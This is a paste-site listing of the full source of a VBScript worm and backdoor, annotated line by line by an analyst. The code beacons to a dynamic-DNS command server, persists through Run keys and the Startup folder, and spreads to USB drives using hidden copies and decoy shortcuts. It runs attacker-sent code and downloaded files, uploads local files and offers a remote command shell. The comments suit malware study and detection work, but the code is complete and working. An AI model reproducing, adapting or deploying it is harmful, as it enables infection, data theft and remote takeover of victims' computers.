dansguardian

VBS WORM (no detectado) código fuente

Sep 3rd, 2013
  1. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2.  
  ' ANALYST NOTE: C2 endpoint. Every beacon is an HTTP POST to http://host:port/<command>
  ' (see function post). The dynamic-DNS host, the port and the "<|>" field separator
  ' below are the network indicators for this sample.
  3. host = "hattouma12.no-ip.biz"
  4. port = 88
  ' Drop directory; expanded at line 23 and replaced by %temp% if it does not exist.
  5. installdir = "%temp%"
  ' Toggles for the .lnk decoys written to removable drives (files / folders, see sub install).
  6. lnkfile = true
  7. lnkfolder = true
  8.  
  9. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  10.  
  ' Shared COM objects: WScript.Shell (registry, Run, shortcuts), Scripting.FileSystemObject
  ' (drives/files) and MSXML2.XMLHTTP (C2 transport).
  11. dim shellobj
  12. set shellobj = wscript.createobject("wscript.shell")
  13. dim filesystemobj
  14. set filesystemobj = createobject("scripting.filesystemobject")
  15. dim httpobj
  16. set httpobj = createobject("msxml2.xmlhttp")
  17.  
  18.  
  19. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=-=
  20.  
  ' installname is whatever file name the script was launched under; it is reused for every
  ' dropped copy and (minus extension) as the Run-key value name and the HKLM\software marker.
  21. installname = wscript.scriptname
  22. startup = shellobj.specialfolders ("startup") & "\"
  23. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  24. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  ' Wire-protocol field separator; also embedded in the User-Agent header (see information).
  25. spliter = "<|>"
  ' Beacon interval in milliseconds; overwritten by the "sleep" command through eval.
  26. sleep = 5000
  27. dim response
  28. dim cmd
  29. dim param
  30. info = ""
  31. usbspreading = ""
  32. startdate = ""
  ' Text-stream handle on the installed copy, opened in function instance and reused by "update".
  33. dim oneonce
  34.  
  35. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  ' From here on every runtime error is silently swallowed; no branch below reports failure.
  36. on error resume next
  37.  
  38.  
  ' instance: records the USB-spread marker, installs persistence, relaunches from installdir
  ' if needed and opens the file handle that apparently serves as a single-instance guard.
  39. instance
  ' Main C2 loop: re-run propagation, poll "is-ready", split the reply on "<|>" and dispatch
  ' on the first field. An empty or failed reply matches no case and just sleeps.
  40. while true
  41.  
  42. install
  43.  
  44. response = ""
  45. response = post ("is-ready","")
  46. cmd = split (response,spliter)
  47. select case cmd (0)
  ' "excecute" (sic - the misspelling is the wire keyword): runs attacker-supplied VBScript
  ' through the Execute statement, i.e. unrestricted remote code execution in this process.
  48. case "excecute"
  49.       param = cmd (1)
  50.       execute param
  ' "update": release the held handle, truncate the installed copy (OpenTextFile mode 2 =
  ' ForWriting), write the new script body, relaunch it hidden (//B) and exit this instance.
  51. case "update"
  52.       param = cmd (1)
  53.       oneonce.close
  54.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  55.       oneonce.write param
  56.       oneonce.close
  57.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  58.       wscript.quit
  ' "uninstall": remove persistence, dropped copies and .lnk decoys, then quit (sub uninstall).
  59. case "uninstall"
  60.       uninstall
  ' "send": fetch a file from the C2 file store and run it (sub download).
  61. case "send"
  62.       download cmd (1),cmd (2)
  ' "site-send": fetch an arbitrary URL into installdir and run it (sub sitedownloader).
  63. case "site-send"
  64.       sitedownloader cmd (1),cmd (2)
  ' "recv": exfiltrate a local file to the C2 (function upload).
  65. case "recv"
  66.       param = cmd (1)
  67.       upload (param)
  ' Reconnaissance commands: drive list, directory listing, process list, shell command.
  68. case  "enum-driver"
  69.       post "is-enum-driver",enumdriver  
  70. case  "enum-faf"
  71.       param = cmd (1)
  72.       post "is-enum-faf",enumfaf (param)
  73. case  "enum-process"
  74.       post "is-enum-process",enumprocess  
  75. case  "cmd-shell"
  76.       param = cmd (1)
  77.       post "is-cmd-shell",cmdshell (param)  
  ' "delete": remove a file or folder by path (sub deletefaf).
  78. case  "delete"
  79.       param = cmd (1)
  80.       deletefaf (param)
  ' "exit-process": taskkill /F /T by PID (sub exitprocess).
  81. case  "exit-process"
  82.       param = cmd (1)
  83.       exitprocess (param)
  ' "sleep": the new interval is eval'ed rather than converted with CLng, so this is a
  ' second remote-eval path, not just a numeric setting.
  84. case  "sleep"
  85.       param = cmd (1)
  86.       sleep = eval (param)        
  87. end select
  88.  
  89. wscript.sleep sleep
  90.  
  91. wend
  92.  
  93.  
  94. sub install
  ' Propagation routine, invoked on every loop iteration. It re-applies persistence (upstart)
  ' and then seeds every ready removable drive (FSO DriveType 1) with a hidden copy of this
  ' script plus .lnk decoys that launch the copy before opening the real file or folder.
  ' Errors are swallowed, so a read-only or full drive is silently skipped.
  95. on error resume next
  96. dim lnkobj
  97. dim filename
  98. dim foldername
  99. dim fileicon
  100. dim foldericon
  101.  
  102. upstart
  103. for each drive in filesystemobj.drives
  104.  
  105. if  drive.isready = true then
  106. if  drive.freespace  > 0 then
  107. if  drive.drivetype  = 1 then
  ' Drop a copy at the drive root and mark it Hidden + System (FSO attributes 2 + 4).
  108.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  109.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  110.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  111.     end if
  ' For every root-level file that is not already a .lnk: hide the original, then write a
  ' shortcut carrying the original's name and icon.
  112.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  113.         if not lnkfile then exit for
  114.         if  instr (file.name,".") then
  115.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  116.                 file.attributes = 2+4
  117.                 if  ucase (file.name) <> ucase (installname) then
  ' The shortcut name is the text before the FIRST dot, so "a.b.txt" yields "a.lnk".
  118.                     filename = split(file.name,".")
  119.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  ' WindowStyle 7 = minimised. The target is cmd.exe, which first starts the dropped script
  ' and then the hidden original. Spaces in names are wrapped via the replace() quoting trick.
  ' No working directory is set, so the relative names only resolve when the shortcut is
  ' opened with the drive root as the current directory (the Explorer double-click case).
  120.                     lnkobj.windowstyle = 7
  121.                     lnkobj.targetpath = "cmd.exe"
  122.                     lnkobj.workingdirectory = ""
  123.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  ' Borrow the icon registered for the extension (HKCR\<progid>\DefaultIcon) so the decoy
  ' looks like the hidden file; if the registry value has no ",index" part, use the file itself.
  124.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  125.                     if  instr (fileicon,",") = 0 then
  126.                         lnkobj.iconlocation = file.path
  127.                     else
  128.                         lnkobj.iconlocation = fileicon
  129.                     end if
  130.                     lnkobj.save()
  131.                 end if
  132.             end if
  133.         end if
  134.     next
  ' Same trick for root-level folders: hide the folder and write <folder>.lnk that starts the
  ' script and then opens the folder with explorer.
  135.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  136.         if not lnkfolder then exit for
  137.         folder.attributes = 2+4
  138.         foldername = folder.name
  139.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  140.         lnkobj.windowstyle = 7
  141.         lnkobj.targetpath = "cmd.exe"
  142.         lnkobj.workingdirectory = ""
  143.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  144.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  145.         if  instr (foldericon,",") = 0 then
  146.             lnkobj.iconlocation = folder.path
  147.         else
  148.             lnkobj.iconlocation = foldericon
  149.         end if
  150.         lnkobj.save()
  151.     next
  152. end If
  153. end If
  154. end if
  155. next
  156. err.clear
  157. end sub
  158.  
  159. sub uninstall
  ' Remote "uninstall" handler. Removes both Run keys, the Startup-folder copy and the
  ' currently running script file, then sweeps removable drives: clears attributes, deletes the
  ' dropped copy and the .lnk decoys, unhides folders, and finally quits.
  ' Note: every root-level .lnk on the drive is deleted (line 185), not only the ones this
  ' script created.
  160. on error resume next
  161. dim filename
  162. dim foldername
  163.  
  164. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  165. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  166. filesystemobj.deletefile startup & installname ,true
  ' Deletes the running copy; after instance() this is normally the installdir copy.
  167. filesystemobj.deletefile wscript.scriptfullname ,true
  168.  
  169. for  each drive in filesystemobj.drives
  170. if  drive.isready = true then
  171. if  drive.freespace  > 0 then
  172. if  drive.drivetype  = 1 then
  173.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
  174.          on error resume next
  175.          if  instr (file.name,".") then
  176.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  ' Non-.lnk file: clear Hidden/System, then remove the matching <first-part>.lnk decoy,
  ' or the dropped script copy itself when the name matches installname.
  177.                  file.attributes = 0
  178.                  if  ucase (file.name) <> ucase (installname) then
  179.                      filename = split(file.name,".")
  180.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  181.                  else
  182.                      filesystemobj.deletefile (drive.path & "\" & file.name)
  183.                  end If
  184.              else
  ' Any remaining .lnk at the root is deleted unconditionally.
  185.                  filesystemobj.deletefile (file.path)
  186.              end if
  187.          end if
  188.      next
  189.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  190.          folder.attributes = 0
  191.      next
  192. end if
  193. end if
  194. end if
  195. next
  196. wscript.quit
  197. end sub
  198.  
  199. function post (cmd ,param)
  ' C2 transport. Synchronous HTTP POST of param to http://host:port/cmd; returns the response
  ' body. The host fingerprint from information() is sent as the User-Agent value (the header
  ' name is written with a trailing colon, exactly as on line 203), so the victim's HWID,
  ' computer name, user name, OS and AV list travel on every beacon - a strong network
  ' signature. There is no error handling here; the caller's on error resume next applies.
  200.  
  201. post = param
  202. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  203. httpobj.setrequestheader "user-agent:",information
  204. httpobj.send param
  205. post = httpobj.responsetext
  206. end function
  207.  
  208. function information
  ' Builds and caches (in the undeclared global inf) the victim fingerprint used as the
  ' User-Agent: hwid <|> computername <|> username <|> OS caption <|> "plus" <|> AV list
  ' <|> usbspreading marker. "plus" is a fixed literal - presumably a build/variant tag.
  209. on error resume next
  210. if  inf = "" then
  211.     inf = hwid & spliter
  212.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  213.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  214.  
  215.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  216.     set os = root.execquery ("select * from win32_operatingsystem")
  ' Only the first Win32_OperatingSystem row is used.
  217.     for each osinfo in os
  218.        inf = inf & osinfo.caption & spliter  
  219.        exit for
  220.     next
  221.     inf = inf & "plus" & spliter
  222.     inf = inf & security & spliter
  223.     inf = inf & usbspreading
  224.     information = inf  
  225. else
  226.     information = inf
  227. end if
  228. end function
  229.  
  230.  
  231. sub upstart ()
  ' Persistence. Writes a Run value named after the script (name before the first dot) under
  ' both HKCU and HKLM pointing to wscript.exe //B "<installdir><installname>", and copies the
  ' script into installdir and the user's Startup folder. The HKLM write needs admin rights
  ' and fails silently otherwise (on error resume next). Called from instance and on every
  ' iteration of install.
  232. on error resume Next
  233.  
  234. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  235. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  236. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  237. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  238.  
  239. end sub
  240.  
  241.  
  242. function hwid
  ' Bot identifier: the VolumeSerialNumber of the first Win32_LogicalDisk that has one.
  ' Returns Empty if WMI fails or no disk reports a serial (errors are swallowed).
  243. on error resume next
  244.  
  245. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  246. set disks = root.execquery ("select * from win32_logicaldisk")
  247. for each disk in disks
  248.     if  disk.volumeserialnumber <> "" then
  249.         hwid = disk.volumeserialnumber
  250.         exit for
  251.     end if
  252. next
  253. end function
  254.  
  255.  
  256. function security
  ' Enumerates registered antivirus products via the WMI SecurityCenter / SecurityCenter2
  ' namespace and returns their display names joined with " ."; "nan-av" when none found.
  ' The version parsing below is broken: the loop counter is x but the body indexes with i
  ' (never assigned, line 269), and line 266 reads .version on the collection rather than an
  ' item. osversion is therefore not the real OS version and the "> 6" test only succeeds by
  ' coercion accident - do not use this string as a reliable OS fingerprint.
  257. on error resume next
  258.  
  259. security = ""
  260.  
  261. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  262. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  263. for each objitem in colitems
  264.     versionstr = split (objitem.version,".")
  265. next
  266. versionstr = split (colitems.version,".")
  267. osversion = versionstr (0) & "."
  268. for  x = 1 to ubound (versionstr)
  269.      osversion = osversion &  versionstr (i)
  270. next
  ' eval on a string the script built itself; harmless here but the same pattern is used on
  ' attacker data in the main loop.
  271. osversion = eval (osversion)
  272. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  273.  
  274. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  275. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  276.  
  277. for each objantivirus in colantivirus
  278.     security  = security  & objantivirus.displayname & " ."
  279. next
  280. if security  = "" then security  = "nan-av"
  281. end function
  282.  
  283.  
  284. function instance
  ' Startup bookkeeping, run once before the main loop:
  '  1. Read the marker at HKLM\software\<name>\ (default value). If absent, decide whether
  '     this run came from a removable drive - script path of the form "X:\<installname>" -
  '     and store "true - <date>" or "false - <date>". The value is later reported in the
  '     User-Agent as the usbspreading field.
  '  2. Install persistence (upstart).
  '  3. If this process is not the installdir copy (8.3 paths compared), launch that copy
  '     hidden and quit.
  '  4. Open the installed copy for append (mode 8) and keep the handle in oneonce; if the
  '     open fails the script quits. This looks like a single-instance guard (a second instance
  '     cannot open the file the first one holds) - confirm.
  285. on error resume next
  286.  
  287. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  288. if usbspreading = "" then
  289.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  290.       usbspreading = "true - " & date
  291.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  292.    else
  293.       usbspreading = "false - " & date
  294.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  295.  
  296.    end if
  297. end If
  298.  
  299.  
  300.  
  301. upstart
  302. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  303. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  304. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  305.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  306.     wscript.quit
  307. end If
  308. err.clear
  309. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  310. if  err.number > 0 then wscript.quit
  311. end function
  312.  
  313.  
  314. sub sitedownloader (fileurl,filename)
  ' Download-and-execute from an arbitrary URL ("site-send" command). Fetches fileurl with a
  ' synchronous GET, writes the body as binary (ADODB.Stream type 1) to installdir & filename
  ' and runs the result. filename comes straight from the C2 with no sanitisation, so a
  ' value containing "..\" escapes installdir. Any pre-existing file at the target is deleted
  ' first, and the run happens whenever a file exists there, even if this download failed.
  315.  
  316. strlink = fileurl
  317. strsaveto = installdir & filename
  318. set objhttpdownload = createobject("msxml2.xmlhttp" )
  319. objhttpdownload.open "get", strlink, false
  320. objhttpdownload.send
  321.  
  322. set objfsodownload = createobject ("scripting.filesystemobject")
  323. if  objfsodownload.fileexists (strsaveto) then
  324.     objfsodownload.deletefile (strsaveto)
  325. end if
  326.  
  327. if objhttpdownload.status = 200 then
  328.    dim  objstreamdownload
  329.    set  objstreamdownload = createobject("adodb.stream")
  330.    with objstreamdownload
  331.         .type = 1
  332.         .open
  333.         .write objhttpdownload.responsebody
  334.         .savetofile strsaveto
  335.         .close
  336.    end with
  337.    set objstreamdownload = nothing
  338. end if
  339. if objfsodownload.fileexists(strsaveto) then
  340.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  341. end if
  342. end sub
  343.  
  344. sub download (fileurl,filedir)
  ' Download-and-execute from the C2's own file store ("send" command). fileurl is a
  ' server-side path; the request is a POST to http://host:port/is-sending<|>fileurl and the
  ' body is saved under filedir (default installdir) using the part of fileurl after the last
  ' backslash. The saved file is executed with shellobj.run. Same caveats as sitedownloader:
  ' no path sanitisation, and execution is gated only on the file existing afterwards.
  345.  
  346. if filedir = "" then
  347.    filedir = installdir
  348. end if
  349.  
  350. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  351. set objhttpdownload = createobject("msxml2.xmlhttp")
  352. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  353. objhttpdownload.send ""
  354.      
  355. set objfsodownload = createobject ("scripting.filesystemobject")
  356. if  objfsodownload.fileexists (strsaveto) then
  357.     objfsodownload.deletefile (strsaveto)
  358. end if
  359. if  objhttpdownload.status = 200 then
  360.     dim  objstreamdownload
  361.     set  objstreamdownload = createobject("adodb.stream")
  362.     with objstreamdownload
  363.          .type = 1
  364.          .open
  365.          .write objhttpdownload.responsebody
  366.          .savetofile strsaveto
  367.          .close
  368.     end with
  369.     set objstreamdownload  = nothing
  370. end if
  371. if objfsodownload.fileexists(strsaveto) then
  372.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  373. end if
  374. end sub
  375.  
  376.  
  377. function upload (fileurl)
  ' Exfiltration ("recv" command). Reads the local file at fileurl as binary via ADODB.Stream
  ' and POSTs the raw bytes to http://host:port/is-recving<|>fileurl. The local httpobj
  ' shadows the global one. Line 388 clears objstreamdownload (a name not used in this
  ' function) instead of objstreamuploade, so the stream object is never explicitly released.
  378.  
  379. dim  httpobj,objstreamuploade,buffer
  380. set  objstreamuploade = createobject("adodb.stream")
  381. with objstreamuploade
  382.      .type = 1
  383.      .open
  384.      .loadfromfile fileurl
  385.      buffer = .read
  386.      .close
  387. end with
  388. set objstreamdownload = nothing
  389. set httpobj = createobject("msxml2.xmlhttp")
  390. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  391. httpobj.send buffer
  392. end function
  393.  
  394.  
  395. function enumdriver ()
  ' Drive reconnaissance ("enum-driver"): returns "<path>|<drivetype><|>" for every ready drive.
  ' Drives that are not ready are skipped; drivetype is the FSO DriveType number.
  396.  
  397. for  each drive in filesystemobj.drives
  398. if   drive.isready = true then
  399.      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  400. end if
  401. next
  402. end Function
  403.  
  404. function enumfaf (enumdir)
  ' Directory listing ("enum-faf"). Returns enumdir followed by one record per subfolder and
  ' per file: name|size|d-or-f|attributes, records separated by "<|>". Folders are listed
  ' first with an empty size field. There is no on error resume next in this function, so
  ' an invalid enumdir raises into the caller's global error suppression.
  405.  
  406. enumfaf = enumdir & spliter
  407. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  408.      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  409. next
  410.  
  411. for  each file in filesystemobj.getfolder (enumdir).files
  412.      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
  413.  
  414. next
  415. end function
  416.  
  417.  
  418. function enumprocess ()
  ' Process reconnaissance ("enum-process"): one "name|pid|executablepath<|>" record per
  ' Win32_Process row. Returns Empty if the WMI query fails.
  419.  
  420. on error resume next
  421.  
  422. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  423. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  424.  
  425. dim objitem
  426. for each objitem in colitems
  427.     enumprocess = enumprocess & objitem.name & "|"
  428.     enumprocess = enumprocess & objitem.processid & "|"
  429.     enumprocess = enumprocess & objitem.executablepath & spliter
  430. next
  431. end function
  432.  
  433. sub exitprocess (pid)
  ' Kills a process tree by PID ("exit-process") with taskkill /F /T, window style 7
  ' (minimised), waiting for completion. pid is interpolated unvalidated into the command line.
  434. on error resume next
  435.  
  436. shellobj.run "taskkill /F /T /PID " & pid,7,true
  437. end sub
  438.  
  439. sub deletefaf (url)
  ' Deletes a path ("delete" command). Tries DeleteFile and then DeleteFolder on the same
  ' path; whichever does not apply fails silently under on error resume next.
  440. on error resume next
  441.  
  442. filesystemobj.deletefile url
  443. filesystemobj.deletefolder url
  444.  
  445. end sub
  446.  
  447. function cmdshell (cmd)
  ' Remote shell ("cmd-shell"): runs the attacker-supplied string through %comspec% /c and
  ' returns captured output. Only one stream is read: stdout if it is not already at end of
  ' stream, otherwise stderr, otherwise "". Because AtEndOfStream is checked right after
  ' Exec returns, a command that has not produced stdout yet may have its output skipped,
  ' and stderr is lost whenever stdout has data. ReadAll blocks until the process closes
  ' the stream. The local httpobj declaration is unused.
  448.  
  449. dim httpobj,oexec,readallfromany
  450.  
  451. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  452. if not oexec.stdout.atendofstream then
  453.    readallfromany = oexec.stdout.readall
  454. elseif not oexec.stderr.atendofstream then
  455.    readallfromany = oexec.stderr.readall
  456. else
  457.    readallfromany = ""
  458. end if
  459.  
  460. cmdshell = readallfromany
  461. end function